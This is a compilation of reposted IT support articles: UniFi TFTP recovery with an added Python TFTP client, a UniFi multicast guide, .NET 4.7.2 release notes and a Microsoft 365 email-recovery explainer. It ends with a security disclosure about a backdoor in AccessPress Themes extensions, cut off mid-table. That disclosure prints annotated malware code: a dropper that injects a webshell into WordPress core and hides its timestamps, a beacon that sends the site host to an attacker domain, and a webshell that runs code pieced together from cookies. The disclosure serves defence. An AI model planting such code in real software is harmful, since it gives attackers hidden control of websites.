Ubiquiti UniFi – TFTP Recovery for Bricked Access Points

Overview

Readers will learn how to properly recover a UniFi Access Point (UAP) using the TFTP method.

Table of Contents

  1. Introduction
  2. TFTP for Windows
  3. TFTP for Linux & macOS
  4. Related Articles

Introduction

The method described in this article should help recover a “bricked” UniFi AP. This method will not void the device warranty, whereas opening the chassis for serial TTL access will. Most soft-brick issues will be resolved via this procedure. If your issue continues unresolved, it might indicate a hardware issue that cannot be resolved via software. Feel free to contact support if you believe this to be the case.

IMPORTANT: When recovering UAP Gen1 devices, the device itself will need approximately 5 minutes to finish recovering after the put command is entered.

TFTP for Windows

1. Prior to beginning the TFTP recovery, download the firmware for the device needed by visiting the UniFi Downloads section. Navigate to the UAP in question using the menu on the left, and find the latest firmware file. Confirm it is a .bin firmware file and not the UniFi Network application software file before downloading.

2. Once the correct firmware has been identified, download it and save it on your computer. 

3. Unplug the ethernet cable from the UniFi AP.

4. Using a paperclip press and hold the UniFi AP’s reset button. Make sure you can feel it being depressed by the paperclip. Do not release the button until step 6.

5. While keeping the reset button pressed in, plug the ethernet cable back into the AP. Keep the reset button depressed until you see the device’s LED flashing in upgrade mode (read about LED patterns in this article). This may take up to 25 seconds. User Tip: The UAP will not respond to ping requests while in TFTP recovery mode, but will respond to ARP requests.

6. You may release the reset button. Now the device is in TFTP transfer mode.

7. Set a static IP on your computer’s NIC. A static IP of 192.168.1.25, a subnet mask of 255.255.255.0 and a gateway of 192.168.1.20 will work. In recovery mode the AP listens at 192.168.1.20, which is why that address is also entered as the TFTP remote host in step 11.

8. Plug the UniFi PoE injector’s LAN cable directly into your computer.

9. This example uses the PumpKIN TFTP software (the download link on the original page fetches the .exe directly). Allow PumpKIN through the firewall, or temporarily disable the firewall while the computer is cabled directly to the injector, then click “Put File”.

[Image: Put_File.PNG, the PumpKIN “Put File” dialog]

10. In “Local Files” browse for the firmware you downloaded and saved previously (in step 1).

[Image: Local_Files.PNG, the “Local Files” browse field]

11. In the “Remote host” field enter the gateway you had predetermined (192.168.1.20), then click OK.

[Image: Pumpkin_complete.PNG, the completed dialog with “Remote host” set to 192.168.1.20]

12. At this point, the file should begin transferring. The firmware will upgrade now and the device will automatically reboot once it has finished. Do not reboot it yourself.

TFTP for Linux & macOS

1. Prior to beginning the TFTP recovery, download the firmware for the device needed by visiting the UniFi Downloads section. Navigate to the UAP in question using the menu on the left, and find the latest firmware file. Confirm it is a .bin firmware file and not the UniFi Network application software file before downloading.

2. Once the correct firmware has been identified, download it and save it on your computer. You will need to know the exact path to your file, so for this example, we are moving the downloaded firmware file to /Users/username/.

3. Go to System Preferences > Network and set your computer’s network IP address to 192.168.1.25, subnet 255.255.255.0 and gateway 192.168.1.20. User Tip: Take note of what your IP address is before changing it. You will have to revert back to the original IP address in step 12.

4. On macOS, open Applications > Utilities > Terminal and type:

tftp

On Linux, open the command line application of your choice. If your tftp client is the interactive kind, type tftp as above and follow steps 10 and 11. If it is the BusyBox one-shot client, the whole transfer is a single command, so run it only once the AP is in recovery mode (after step 9), substituting the path and firmware name of the file you downloaded in step 2:

tftp -l ~/path/firmware_name.bin -p 192.168.1.20 69

5. A tftp> command prompt will appear. You are ready to reset the AP and connect it to your computer, while it’s in “upgrade mode”.

6. Unplug the ethernet cable from the UniFi AP.

7. Using a paperclip press and hold the UniFi AP’s reset button. Make sure you can feel it being depressed by the paperclip. Do not release the button until step 9.

8. While keeping the reset button pressed in, plug the ethernet cable back into the AP. Keep the reset button depressed until you see the device’s LED flashing in upgrade mode (read about LED patterns in this article). This may take up to 25 seconds. User Tip: The UAP will not respond to ping requests while in TFTP recovery mode, but will respond to ARP requests.

9. You may release the reset button. Now the device is in TFTP transfer mode.

10. On the TFTP command line in Terminal, paste these four lines and hit enter: 

connect 192.168.1.20
binary
rexmt 1
timeout 60


11. Type the command put followed by the path to the firmware downloaded in step 2 and hit enter. Following the example mentioned in step 2, something similar to this would be typed into the Terminal window:

put /Users/Alex/BZ.qca956x.v3.9.27.8537.180317.1235.bin

IMPORTANT: Remember to substitute the path and firmware file name with your own.

Once it is successful, you will see something like this in the Terminal window (the path, byte count and duration will differ for each user):

tftp> connect 192.168.1.20 
tftp> binary
tftp> rexmt 1
tftp> timeout 60
tftp> put /path/firmware.bin
Sent x bytes in y seconds

The file should begin transferring at this point. The firmware will upgrade and the device will automatically reboot once it has finished. Do not reboot it yourself.

12. Re-connect the PoE injector’s LAN cable to your router. Restore the network IP back to what it was before.

User Tip: If your device is having trouble getting adopted by the UniFi Network application after this process, try forgetting the device: go to the UniFi Devices section, click on the UAP in question, and in the properties panel that pops up go to Config (gear icon) > Manage Device > Forget this device. Click on the “Forget” button and try the adoption again.
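Both procedures above (PumpKIN on Windows, the tftp client on Linux and macOS) perform the same exchange on the wire: a write request (WRQ) in octet mode to the AP at 192.168.1.20 on UDP port 69, then 512-byte DATA blocks, each acknowledged by the AP, until a short final block ends the transfer. The Python below is an added example written for this page, not a Ubiquiti tool or code from the original article. It implements that exchange with a 1-second retransmit and 60 attempts to match the rexmt 1 / timeout 60 settings, and includes a constructed loopback server so the protocol can be exercised offline; put_file() is the equivalent of the put command and assumes the AP address from the steps, and it does not replace the reset-button/LED sequence.

```python
# Added example for this page (not Ubiquiti's tool): a minimal RFC 1350 TFTP
# client doing "put" in octet mode, plus a one-shot loopback server so the
# exchange can be run offline.  192.168.1.20/69 are the values from the steps.
import os
import socket
import struct
import threading

WRQ, DATA, ACK, ERROR = 2, 3, 4, 5   # RFC 1350 opcodes used here
BLOCK = 512                          # fixed block size; a short block ends the transfer


def tftp_put(data, host, port=69, remote_name="firmware.bin", timeout=1.0, retries=60):
    """Write `data` to host:port and return the number of bytes acknowledged.
    timeout=1.0 / retries=60 mirror the article's `rexmt 1` / `timeout 60`."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        wrq = struct.pack("!H", WRQ) + remote_name.encode() + b"\0octet\0"
        # The server answers the WRQ with ACK 0 from a *new* port; that port is
        # the transfer ID (TID) every following DATA packet must be sent to.
        peer = _send_and_wait_ack(sock, wrq, (host, port), 0, retries)
        block, sent = 1, 0
        while True:
            chunk = data[(block - 1) * BLOCK: block * BLOCK]
            pkt = struct.pack("!HH", DATA, block & 0xFFFF) + chunk
            _send_and_wait_ack(sock, pkt, peer, block, retries)
            sent += len(chunk)
            if len(chunk) < BLOCK:       # short (possibly empty) block: transfer done
                return sent
            block += 1
    finally:
        sock.close()


def _send_and_wait_ack(sock, pkt, dest, block, retries):
    """Send pkt to dest and wait for the ACK of `block`, retransmitting on timeout."""
    for _ in range(retries):
        sock.sendto(pkt, dest)
        try:
            while True:
                resp, peer = sock.recvfrom(516)
                if block and peer != dest:
                    continue             # packet from a stray TID: ignore it
                op = struct.unpack("!H", resp[:2])[0]
                if op == ERROR:
                    msg = resp[4:].split(b"\0")[0].decode(errors="replace")
                    raise RuntimeError("TFTP error from server: " + msg)
                if op == ACK and struct.unpack("!H", resp[2:4])[0] == (block & 0xFFFF):
                    return peer
                # anything else (e.g. a duplicate of an older ACK): keep waiting
        except socket.timeout:
            pass                         # no ACK in time: fall through and retransmit
    raise TimeoutError("no ACK for block %d after %d attempts" % (block, retries))


def put_file(path, host="192.168.1.20", port=69):
    """Equivalent of `put /path/firmware.bin` at the tftp> prompt."""
    with open(path, "rb") as f:
        return tftp_put(f.read(), host, port, remote_name=os.path.basename(path))


def serve_once(host="127.0.0.1"):
    """Constructed one-shot TFTP write server used only for the offline demo.
    Returns (port, result, thread); result["data"] holds the received bytes."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    lsock.bind((host, 0))
    result = {}

    def run():
        req, client = lsock.recvfrom(516)
        result["name"] = req[2:].split(b"\0")[0].decode()
        tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # fresh TID
        tsock.bind((host, 0))
        tsock.sendto(struct.pack("!HH", ACK, 0), client)
        buf, expected = bytearray(), 1
        while True:
            pkt, _ = tsock.recvfrom(516)
            op, blk = struct.unpack("!HH", pkt[:4])
            if op != DATA:
                continue
            tsock.sendto(struct.pack("!HH", ACK, blk), client)     # re-ACKs duplicates too
            if blk == (expected & 0xFFFF):
                buf += pkt[4:]
                expected += 1
                if len(pkt) - 4 < BLOCK:
                    break
        result["data"] = bytes(buf)
        tsock.close()
        lsock.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return lsock.getsockname()[1], result, t


def loopback_demo(size=1500):
    """Push a constructed `size`-byte payload through the loopback server and
    report whether every byte arrived intact (True/False)."""
    payload = (bytes(range(256)) * (size // 256 + 1))[:size]   # constructed input
    port, result, t = serve_once()
    sent = tftp_put(payload, "127.0.0.1", port, remote_name="test.bin")
    t.join(5)
    return sent == size and result.get("data") == payload
```

Because the AP in recovery mode does not answer ping, the first ACK is the only sign that the bootloader has taken the request; the retransmit loop is what bridges the seconds between releasing the reset button and the bootloader coming up. A firmware image that is an exact multiple of 512 bytes is terminated by an empty DATA block, which the client above sends and the server above expects.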

Source :
https://help.ui.com/hc/en-us/articles/204910124-UniFi-TFTP-Recovery-for-Bricked-Access-Points

Ubiquiti Best Practices for Managing AirPlay Chromecast on UniFi Network

This article explains best practices for configuring larger UniFi networks with AirPlay/Chromecast devices. For efficient and reliable channel utilization, networks with more than 100 WiFi clients will need the multicast block option to be enabled on each of their SSIDs. This guide is especially useful for schools, stadiums, public venues, or similar networks.

Note: This guide applies to a network with a UniFi Security Gateway, UDM, or UDM-Pro. If your network does not have one of these, the steps may need to be adapted.

Creating a ChromeCast/AirPlay Network

Once your UniFi Network scales beyond a certain number of WiFi clients, it is important to ensure that every AP’s WiFi channel continues to be used efficiently. The broadcast traffic from more than 100 clients is typically high enough that WiFi performance may start to degrade. We always recommend enabling the multicast block option setting for larger networks.

However, this option causes a problem for users that would like to use their ChromeCast/AirPlay devices on the same WiFi network, because those devices will no longer hear the mDNS broadcasts from other devices on the network. They will no longer be discoverable.

In order to gain the performance benefits of multicast block while still maintaining discoverability to these WiFi clients, please follow these steps:

  1. Go to Settings > WiFi and select the SSID to check that multicast block is enabled if it has more than 100 clients on it.
  2. Create a separate SSID/VLAN for the ChromeCast/AirPlay clients.
    a. Go to Settings > Networks, and add a New Network.
    b. Go to Settings > WiFi, and add a new WiFi Network, ensuring that the Network from step “a” is selected, instead of LAN.
    c. Go to Settings > Advanced Features > Advanced Gateway Settings > Multicast DNS and enable Multicast DNS, then click Apply Changes.
  3. Forget the old network on your ChromeCast/AirPlay clients and connect them to the new WiFi Network.
  4. Test discoverability from the appropriate mobile apps.

    Source :
    https://help.ui.com/hc/en-us/articles/4409866388887-Best-Practices-for-Managing-AirPlay-Chromecast-on-UniFi-Network

Microsoft .NET Framework 4.7.2 offline installer for Windows

About Microsoft .NET Framework 4.7.2

Microsoft .NET Framework 4.7.2 is a highly compatible, in-place update to .NET Framework 4, 4.5, 4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, and 4.7.1.

  • The offline package can be used in situations in which the web installer cannot be used because of a lack of Internet connectivity. This package is larger than the web installer and does not include the language packs. We recommend that you use the web installer instead of the offline installer for optimal efficiency and bandwidth requirements.
  • When you install this package, the following packages or updates are installed per your operating system:
    • In Windows 7 Service Pack 1 (SP1) and Windows Server 2008 R2 SP1, .NET Framework 4.7.2 is listed as an installed product under the Programs and Features item in Control Panel.
    • In Windows Server 2012, Update for Microsoft Windows (KB4054542) is listed under the Installed Updates item in Control Panel.
    • In Windows 8.1 or Windows Server 2012 R2, Update for Microsoft Windows (KB4054566) is displayed under the Installed Updates item in Control Panel.
    • In Windows 10 Anniversary Update (version 1607), Windows 10 Creators Update (version 1703) and Windows Server 2016, Update for Microsoft Windows (KB4054590) is listed under the Installed Updates item in Control Panel.
    • In Windows 10 Fall Creators Update (version 1709), Update for Microsoft Windows (KB4073120) is listed under the Installed Updates item in Control Panel.

Microsoft .NET Framework 4.7.2 is available on Windows Update and on Windows Server Update Service (WSUS). It will be offered as a recommended update on Windows Update.

Note The package installer (NDP472-KB4054530-x86-x64-AllOS-ENU.exe) was updated on July 10, 2018. If you downloaded the installer before July 10, 2018, we recommend that you download the latest version (4.7.3081.0) of the installer to get the additional fixes included in the update.

Download information

The following files are available for download from the Microsoft Download Center:

For information about how to download Microsoft support files, see How to obtain Microsoft support files from online services.

Issues that are fixed in this update

The following issues are fixed for .NET Framework 4.7.2.

SQL Server (SQL)

  • Fixes an issue in which the .NET Framework API SqlConnection.ConnectionString property is used to set a null or empty connection string. In this situation, a Null Reference Exception (NRE) occurs when you use the API together with .NET Framework 4.7.2. [611802, System.Data.dll, Bug]
  • Fixes an issue in which you connect to Azure SQL DB and MultipleActiveResultSets=true is used in the connection string together with System.Data.SqlClient.SqlConnection. In this situation, the async query operations cause a bad TDS protocol request stream to be sent from the client. This causes the Async Query APIs to fail. [620109, System.Data.dll , Bug]

Windows Presentation Framework (WPF)

  • Adds an AppContext switch that opts out of some work that was done during AppDomain or process shutdown. The switch can reduce (but not eliminate) the possibility of a crash in applications that make unwarranted assumptions about the timing of the finalizer thread. [593963, WindowsBase.dll, Bug]
  • Fixes a crash in WPF that occurs when multiple characters are replaced by a single character (in a different language than the original text) by using IMEPad. [605996, PresentationFramework.dll, Bug]
  • Combo box grouped items now report children correctly through UIAutomation. [605922, PresentationFramework.dll, Bug]

More information

This version of .NET Framework runs side-by-side with .NET Framework 3.5 SP1 and earlier versions. However, it performs an in-place update for .NET Framework 4, 4.5, 4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, and 4.7.1.

Known issues

  • Applications that rely on .NET Framework to initialize a COM component and that run with restricted permissions may fail to start or run correctly, and return “access denied,” “class not registered,” or “internal failure occurred for unknown reasons” errors.
  • For known issues with .NET Framework 4.7.2 see Known issues for .NET Framework 4.7.2.

Command-line switches for this update

For more information about the various command-line options that are supported by this update, see the “Command-Line options” section in .NET Framework Deployment Guide for Developers.

Restart requirement

You may have to restart the computer after you install this update. We recommend that you exit all applications that are using .NET Framework before you install this update.

Supported operating systems

Microsoft .NET Framework 4.7.2 (Offline Installer) supports the following operating systems:

  • Windows Server 2016 (version 1709)
  • Windows 10 Anniversary Update (version 1607) (x86 and x64)
  • Windows 10 Creators Update (version 1703) (x86 and x64)
  • Windows 10 Fall Creators Update (version 1709) (x86 and x64)
  • Windows Server 2012 R2 (x64)
  • Windows 8.1 (x86 and x64)
  • Windows Server 2012 (x64)
  • Windows Server 2008 R2 Service Pack 1 (x64)
  • Windows 7 Service Pack 1 (x86 and x64)

    Source :
    https://support.microsoft.com/en-us/topic/microsoft-net-framework-4-7-2-offline-installer-for-windows-05a72734-2127-a15d-50cf-daf56d5faec2

How to Recover Deleted Emails in Microsoft 365

When the CEO realizes they deleted a vital email thread three weeks ago, email recovery suddenly becomes an urgent task. Sure, you can look in the Deleted Items folder in Outlook, but beyond that, how can you recover what has undergone “permanent” deletion? In this article, we review how you can save the day by bringing supposedly unrecoverable email back from the great beyond.

Deleted Email Recovery in Microsoft and Office 365

Email recovery for Outlook in Exchange Online (Microsoft 365 and Office 365) can be as simple as dragging and dropping the wayward email from the Deleted Items folder to your Inbox. But what do you do when you can’t find the email you want to recover?

First, let’s look at how email recovery is structured in Microsoft 365. There are a few more layers here than you might think! In Microsoft 365, deleted email can be in one of three states: Deleted, Soft-Deleted, or Hard-Deleted. The way you recover email and how long you have to do so depends on the email’s delete status and the applicable retention policy.

Email Recovery in Microsoft 365

Let’s walk through how email gets from one state to another, the default policies, how to recover deleted email in each state, and a few tips along the way.

Items vs. Email

Outlook is all about email yet also has tasks, contacts, calendar events, and other types of information. For example, you can delete calendar entries and may be called on to recover them, just like email. For this reason, the folder for deleted content is called “Deleted Items.” Also, when discussing deletions and recovery, it is common to refer to “items” rather than limiting the discussion to just email.

Policy

Various rules control the retention period for items in the different states of deletion. A policy is an automatically applied action that enforces a rule related to services. Microsoft 365 has hundreds of policies you can tweak to suit your requirements. See Overview of Retention policies for more information.

‘Deleted Items’ Email

When you press the Delete key on an email in Outlook, it’s moved to the Deleted Items folder. That email is now in the “Deleted” state, which simply means it moved to the Deleted Items folder. How long does Outlook retain deleted email? By default – forever! You can recover your deleted mail with just a drag and drop to your Inbox. Done!

If you can’t locate the email in the Deleted Items folder, double-check that you have the Deleted Items folder selected, then scroll to the bottom of the email list. Look for the following message:

[Image: message at the bottom of the Outlook Deleted Items folder list, with a link to fetch the remaining items from the server]

If you see the above message, your cache settings may be keeping only part of the content in Outlook and the rest in the cloud. The cache helps to keep mailbox sizes lower on your hard drive, which in turn speeds up search and load times. Click on the link to download the missing messages.

But I Didn’t Delete It!

If you find content in the Deleted Items and are sure you did not delete it, you may be right! Administrators can set Microsoft 365 policy to delete old Inbox content automatically.

Mail can ‘disappear’ another way. Some companies enable a personal archive mailbox for users. When enabled, by default, any mail two years or older will “disappear” from your Inbox and the Deleted Items folder. However, there is no need to worry. While apparently missing, the email has simply moved to the Archives Inbox. A personal Archives Inbox shows up as a stand-alone mailbox in Outlook, as shown below.

[Image: the personal Archive shown as a stand-alone mailbox in Outlook]

As a result, it’s a good idea to search the Archives Inbox, if it is present when searching for older messages.

Another setting to check is one that deletes email when Outlook is closed. Access this setting in Outlook by clicking “File,” then “Options,” and finally “Advanced” to display this window:

[Image: Outlook Advanced Options, including the “Empty Deleted Items folders when exiting Outlook” setting]

If enabled, Outlook empties the Deleted Items folder when closed. The deleted email then moves to the ‘soft-deleted’ state, which is covered next. Keep in mind that with this setting, all emails will be permanently deleted after 28 days.

‘Soft-Deleted’ Email

The next stage in the process is Soft-Deleted. Soft-deleted email is no longer in the Deleted Items folder but is still easily recovered. At a technical level, the mail is deleted locally from Outlook and placed in the Exchange Online folder named Deletions, which is a sub-folder of Recoverable Items. Any content in the Recoverable Items folder in Exchange Online is, by definition, considered soft-deleted.

You have, by default, 14 days to recover soft-deleted mail. The service administrator can change the retention period to a maximum of 30 days. Be aware that this can consume some of the storage capacity assigned to each user account and you could get charged for overages.

How items become soft-deleted

There are three ways to soft-delete mail or other Outlook items.

  1. Delete an item already in the Deleted Items folder. When you manually delete something that is already in the Deleted Items folder, the item is soft-deleted. Any process, manual or otherwise, that deletes content from this folder results in a ‘soft-delete’.
  2. Pressing Shift + Delete on an email in your Outlook Inbox will bring up a dialog box asking if you wish to “permanently” delete the email. Clicking Yes removes the email without it passing through the Deleted Items folder, but only performs a soft-delete. You can still recover the item if you do so within the 14-day retention period.

[Image: the Outlook “permanently delete” confirmation dialog]

  3. The final way items can be soft-deleted is by using Outlook policies or rules. By default, there are no policies that will automatically remove mail from the Deleted Items folder in Outlook. However, users can create rules that ‘permanently’ delete (that is, soft-delete) email. If you’re troubleshooting missing email, have the user check for such rules: click Rules on the Home menu and examine any created rules in the Rules Wizard.

[Image: the Outlook Rules Wizard showing a “permanently delete” action and its warning]

Note that the caution is a bit misleading as the rule’s action will soft-delete the email, which, as already stated, is not an immediate permanent deletion.

Recovering soft-deleted mail

You can recover soft-deleted mail directly in Outlook. Be sure the Deleted Items folder is selected, then look for “Recover items recently removed from this folder” at the top of the mail column, or the “Recover Deleted Items from Server” action on the Home menu bar.

[Image: the recovery link at the top of the Deleted Items folder in Outlook]

Clicking on the recover items link opens the Recover Deleted Items window.

[Image: the Recover Deleted Items window in Outlook]

Click on the items you want to recover or Select All, and click OK.

NOTE: The recovered email returns to your Deleted Items folder. Be sure to move it into your Inbox.

If the email you’re looking for is not listed, it could have moved to the next stage: ‘Hard-Deleted.’

While users can recover soft-deleted email, Administrators can also recover soft-deleted email on their behalf using the ‘Hard-Deleted’ email recovery process described next (which works for both hard and soft deletions). Also, Microsoft has created two PowerShell commands very useful in this process for those who would rather script the tasks. You can use the Get-RecoverableItems and Restore-RecoverableItems cmdlets to search and restore soft-deleted email.

Hard-Deleted Email

The next stage of deletion is ‘Hard Delete.’ Technically, items are hard-deleted when they move from the Deletions folder to the Purges folder under Recoverable Items in Exchange Online. Administrators can still recover items in that folder within the recovery period set by policy, which ranges from 14 days (the default) to 30 days (the maximum). You can extend the retention beyond 30 days by placing a legal or litigation hold on the item or mailbox.

How items become Hard-Deleted

There are two ways content becomes hard-deleted.

  1. By policy, soft-deleted email is moved to the hard-deleted stage when the retention period expires.
  2. Users can hard-delete mail manually by selecting the Purge option in the Recover Deleted Items window shown above. (Again, choosing to ‘permanently delete’ mail with Shift + Del, results in a soft-delete, not a hard-delete.)

Recovering Hard-Deleted Mail

Once email enters the hard-delete stage, users can no longer recover the content. Only service administrators with the proper privileges can initiate recovery, and no administrators have those privileges by default, not even the global admin. The global admin does have the right to assign privileges so that they can give themselves (or others) the necessary rights. Privacy is a concern here since administrators with these privileges can search and export a user’s email.

Microsoft’s online documentation Recover deleted items in a user’s mailbox details the step-by-step instructions for recovering hard-deleted content. The process is a bit messy compared to other administrative tasks. As an overview, the administrator will:

  1. Assign the required permissions
  2. Search the Inbox for the missing email
  3. Copy the results to a Discovery mailbox where you can view mail in the Purged folder (optional).
  4. Export the results to a PST file.
  5. Import the PST to Outlook on the user’s system and locate the missing email in the Purged folder

Last Chance Recovery

Once hard-deleted items are purged, they are no longer discoverable by any method by users or administrators. You should consider the recovery of such content as unlikely. That said, if the email you are looking for is not recoverable by any of the above methods, you can open a ticket with Microsoft 365 Support. In some circumstances, they may be able to find the email that has been purged but not yet overwritten. They may or may not be willing to look for the email, but it can’t hurt to ask, and it has happened.

What about using Outlook to backup email?

Outlook does allow a user to export email to a PST file. To do this, click “File” in the Outlook main menu, then “Import & Export”.

[Image: Outlook File menu, Import & Export]

You can specify what you want to export and even protect the file with a password.

While useful from time to time, a backup plan that depends on users manually exporting content to a local file doesn’t scale and isn’t reliable. Consequently, don’t rely on this as a possible backup and recovery solution.

Alternative Strategies

After reading this, you may be thinking, “isn’t there an easier way?” A service like Altaro Office 365 Backup allows you to recover from point-in-time snapshots of an inbox or other Microsoft 365 content. Having a service like this when you get that urgent call to recover a mail from a month ago can be a lifesaver.

Summary

Users can recover most deleted email without administrator intervention. Often, deleted email simply sits in the Deleted Items folder until manually cleared. When that occurs, email enters the ‘soft-deleted’ stage and is easily restored by a user within 14 days. After this period, the item enters the ‘hard-deleted’ state. A service administrator can recover hard-deleted items within the recovery window. After the hard-deleted state, email should be considered unrecoverable. Policies can be applied to extend the retention times of deleted mail in any state. While administrators can go far with the web-based administration tools, the entire recovery process can be scripted with PowerShell to customize and scale larger projects or provide granular discovery. It is always a great idea to use a backup solution designed for Microsoft 365, such as Altaro Office 365 Backup.

Source :
https://www.altaro.com/hyper-v/recover-emails-microsoft-365/

Backdoor Found in Themes and Plugins from AccessPress Themes

While investigating a compromised site we discovered some suspicious code in a theme by AccessPress Themes (aka Access Keys), a vendor with a large number of popular themes and plugins. On further investigation, we found that all the themes and most plugins from the vendor contained this suspicious code, but only if downloaded from their own website. The same extensions were fine if downloaded or installed directly from the WordPress.org directory.

Due to the way the extensions were compromised, we suspected an external attacker had breached the website of AccessPress Themes in an attempt to use their extensions to infect further sites.

We contacted the vendor immediately, but at first we did not receive a response. After escalating it to the WordPress.org plugin team, our suspicions were confirmed. AccessPress Themes websites were breached in the first half of September 2021, and the extensions available for download on their site were injected with a backdoor.

Once we had established a channel for communicating with the vendor, we shared our detailed findings with them. They immediately removed the offending extensions from their website.

Most of the plugins have since been updated, and known clean versions are listed towards the bottom of this post. However, the affected themes have not been updated, and have been pulled from the WordPress.org theme repository. If you have any of the themes listed towards the bottom of this post installed on your site, we recommend migrating to a new theme as soon as possible.

This disclosure concerns a large number of extensions, both plugins and themes. Skip to the list below, or read on for the details.

Details:

Vendor: AccessPress Themes
Vendor url: https://accesspressthemes.com
Plugins: multiple
Themes: multiple
CVE: CVE-2021-24867

Analysis:

The infected extensions contained a dropper for a webshell that gives the attackers full access to the infected sites. The dropper is located in the file inital.php (sic) in the main plugin or theme directory. When run, it installs a cookie-based webshell in wp-includes/vars.php. The shell is installed as a function named wp_is_mobile_fix(), placed just in front of the wp_is_mobile() function, presumably so as not to arouse suspicion in anybody casually scrolling through the vars.php file.

function makeInit() {
    $b64 = 'ba' . 'se64' . '_dec' . 'ode';      // assembles 'base64_decode' to dodge naive string scans
    $b = 'ZnVuY3Rpb2........TsKCg==';           // base64-encoded webshell source (truncated in the post)

    $f = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/vars.php';
    if(file_exists($f)) {
        $fp = 0777 & @fileperms($f);           // remember permissions and mtime...
        $ft = @filemtime($f);
        $fc = @file_get_contents($f);
        if(strpos($fc, 'wp_is_mobile_fix') === false) {   // only inject once
            $fc = str_replace('function wp_is_mobile()',
                $b64($b) . 'function wp_is_mobile()',     // shell goes right before wp_is_mobile()
                $fc);
            @file_put_contents($f, $fc);
            @touch($f, $ft);                   // ...and restore them so the edit is not obvious
            @chmod($f, $fp);
        }
        return true;
    }
    return false;
}

Once the shell is installed, the dropper will phone home by loading a remote image from the URL hxxps://www.wp-theme-connect.com/images/wp-theme.jpg with the url of the infected site and information about which theme it uses as query arguments. Finally, it will remove the dropper source file to avoid detection when the request is finished executing.

function finishInit() {
    unlink(__FILE__);                          // delete the dropper itself
}

add_action( 'admin_notices', 'wp_notice_plug', 20 );
if ( !function_exists( 'wp_notice_plug' ) ) {

    function wp_notice_plug() {
        // beacon: hidden image request leaks the site host and the extension name
        echo '<img style="display: none;" src="https://www.wp-theme-connect.com/images/wp-theme.jpg?ph=' . $_SERVER["HTTP_HOST"] . '&phn=accesspress-anonymous-post">';
    }

}
register_shutdown_function('finishInit');      // self-delete runs after the request finishes

The webshell itself triggers if the user agent string in the request is wp_is_mobile and the request contains eight specific cookies. It pieces together and executes a payload from these supplied cookies.

$is_wp_mobile = ($_SERVER['HTTP_USER_AGENT'] == 'wp_is_mobile');   // trigger: exact user agent string
$g = $_COOKIE;

// with exactly eight cookies present, function names and payload are pieced
// together from cookie values and the resulting callable is executed
(count($g) == 8 && $is_wp_mobile) ?
(($qr = $g[33].$g[32]) && ($iv = $qr($g[78].$g[18])) &&
($_iv = $qr($g[12].$g[17])) && ($_iv = @$iv($g[10], $_iv($qr($g[53])))) && @$_iv()) : $g;

We have also seen another, presumably older, variant of the backdoor directly embedded in the theme/plugin’s functions.php file. This variant uses the same mechanism with piecing together the payload from eight cookies, but does not filter on the request’s user agent string.

To ensure that the dropper is executed, the main plugin file (for plugins) or the functions.php file (for themes) has been modified with code to execute the inital.php file if it exists.

if(is_admin()) {
    add_action( "init", 'apap_plugin_check' );   // runs on admin requests, e.g. when the plugin is activated
}

function apap_plugin_check(){
    if(file_exists(__DIR__ . "/inital.php")){
        include(__DIR__ . "/inital.php");          // run the dropper once; it deletes itself afterwards
    }
}

One striking detail from the timestamps of the compromised plugins is that they are all from early September. The majority are from September 6 and 7, with a few files from September 2 and 3. Similarly for the themes, all were compromised on September 22, except accessbuddy on September 9.

Also, the timestamps within the zip-archives are very uniform, with almost all files with the exact same timestamp, except for the modified main plugin file and the added dropper file that is stamped a few minutes later (usually about 2-5 minutes after the other files in the archive).

Looking at the timestamps for the zip-files downloaded from the wordpress.org repository however, we find a distribution of timestamps corresponding to when plugin/theme was actually updated. Also the distribution of timestamps within the archive is less uniform and reflects which files were updated in the release, and which are unchanged from an older release.

This suggests to us that the files on AccessPress Themes’ website were modified intentionally, in a coordinated action after they were originally released. The compromise seems to have been performed in two stages, one for the plugins and a later one for the themes, each preceded by some earlier attempts, possibly to fine-tune the process.

Our investigation has only looked at the themes and plugins freely available from the AccessPress Themes’ website. We assume their paid pro themes are affected similarly, but we have not examined these. If you have any of these, please contact AccessPress Themes’ support for further advice.

Affected themes

If you have any of the themes below installed on your site, we recommend migrating to another theme as soon as you’re able to. AccessPress Themes has not yet provided any updates for any of these, and they have been pulled from the WordPress.org repository.

Theme slug              Version
accessbuddy             1.0.0
accesspress-basic       3.2.1
accesspress-lite        2.92
accesspress-mag         2.6.5
accesspress-parallax    4.5
accesspress-ray         1.19.5
accesspress-root        2.5
accesspress-staple      1.9.1
accesspress-store       2.4.9
agency-lite             1.1.6
aplite                  1.0.6
bingle                  1.0.4
bloger                  1.2.6
construction-lite       1.2.5
doko                    1.0.27
enlighten               1.3.5
fashstore               1.2.1
fotography              2.4.0
gaga-corp               1.0.8
gaga-lite               1.4.2
one-paze                2.2.8
parallax-blog           3.1.1574941215
parallaxsome            1.3.6
punte                   1.1.2
revolve                 1.3.1
ripple                  1.2.0
scrollme                2.1.0
sportsmag               1.2.1
storevilla              1.4.1
swing-lite              1.1.9
the-launcher            1.3.2
the-monday              1.4.1
uncode-lite             1.3.1
unicon-lite             1.2.6
vmag                    1.2.7
vmagazine-lite          1.3.5
vmagazine-news          1.0.5
zigcy-baby              1.0.6
zigcy-cosmetics         1.0.5
zigcy-lite              2.0.9

Table 1: Themes and versions compromised by the attack.

Affected plugins

If you have any of the following plugins installed on your site with a version number listed in the Bad column, we recommend upgrading to the version in the Clean column immediately. Note that plugins installed through WordPress.org are clean, even if their version is listed in the Bad column; we still recommend upgrading to the known clean version to be on the safe side.

Plugins with no version number in the Clean column have not yet been updated, and we recommend replacing them with other plugins if at all possible.

Plugin slug                          Bad      Clean    Note
accesspress-anonymous-post           2.8.0    2.8.1    1
accesspress-custom-css               2.0.1    2.0.2
accesspress-custom-post-type         1.0.8    1.0.9
accesspress-facebook-auto-post       2.1.3    2.1.4
accesspress-instagram-feed           4.0.3    4.0.4
accesspress-pinterest                3.3.3    3.3.4
accesspress-social-counter           1.9.1    1.9.2
accesspress-social-icons             1.8.2    1.8.3
accesspress-social-login-lite        3.4.7    3.4.8
accesspress-social-share             4.5.5    4.5.6
accesspress-twitter-auto-post        1.4.5    1.4.6
accesspress-twitter-feed             1.6.7    1.6.8
